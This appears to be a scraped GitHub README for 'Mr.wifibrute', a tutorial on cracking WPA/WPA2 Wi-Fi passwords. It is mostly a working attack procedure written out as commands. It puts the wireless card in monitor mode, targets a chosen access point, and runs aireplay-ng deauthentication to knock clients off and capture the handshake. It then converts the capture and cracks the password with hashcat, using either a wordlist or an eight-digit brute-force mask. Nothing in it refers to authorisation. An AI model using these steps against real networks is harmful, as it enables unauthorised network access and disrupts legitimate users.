Mr.wifibrute
Get handshake and crack wpa/wpa2 security wifi passwords
Install / Use
/learn @ericpd/Mr.wifibruteREADME
Crack WIFI Password (WPA/WPA2) using Aircrack-ng
Prerequirments :
- Aircrack-ng :
sudo apt install aircrack-ng - GPU for
hashcat
Lets capture the flag (I mean *mr.wifibrute):
Open terminal.....
Terminal-1:
-
Detect your wireless network interface :
ifconfig

Note: Here <i>wlp3s0</i> is my wireless interface.
if coudn't find command then try :
/sbin/ifconfig
-
Start monitor mode :
sudo airmon-ng start wlp3s0

-
capture traffic :
sudo airodump-ng wlp3s0mon

Terminal-2:
-
select target and focus on one AP on channel:
sudo airodump-ng --bssid xx.xx.xx.xx.xx.xx -c y --write filename wlp3s0mon
- xx.xx.xx.xx.xx.xx defines : AP BSSID -> 00.11.22.33.44.55 (suppose)
- y defines : AP channel -> 10 (suppose)
- filename is the file name where the handshake will captute and make some other stuffs .

Terminal-3:
-
Send traffic to the channel :
sudo aireplay-ng --deauth y -a xx.xx.xx.xx.xx.xx wlp3s0mon
- ammoun of traffic-> y

-
Capture handshake : it will be shown in the monitor if captured ! at Terminal-2.

-
Now you got the handshake (terminal-2)
-
Stop the process of terminal-2 :
ctrl+c
Now Lets crack the password !
There will be a WPAcrack-01.cap file in your home directory
- convert cap file into hccapx file : https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
or
-
use mr.wifibrute.c file to convert the cap file to hccapx file
gcc mr.wifibrute.c -o mr.wifibrute && ./mr.wifibrute file.cap file.hccapx

Note : cap to pkid (in case of pkid) :
hcxpcaptool -z pmkidhash suva-01.cap
-
Crack password using hashcat :
-
Install hashcat :
sudo apt install hashcat -
check is everything oky ? :
hashcat -Ito use hashcat you need gpu -
crack password :
hashcat -m 2500 wpacrack.hccapx dictionary.txt
- dictionary.txt -> word list (suppose)
- wpacrack.hccapx is the handshake file


-
-
Bruteforce : Example (bruteforce for length 8 password using 0-9 digits) :
hashcat -a 3 -m 16800 pmkidhash ?d?d?d?d?d?d?d?d
Then you will get the password (if you are lucky enough).
here password : secret -
Others : All ready cracked pass check :
hashcat -m 2500 test.mr.wifibrute rockyou.txt --show
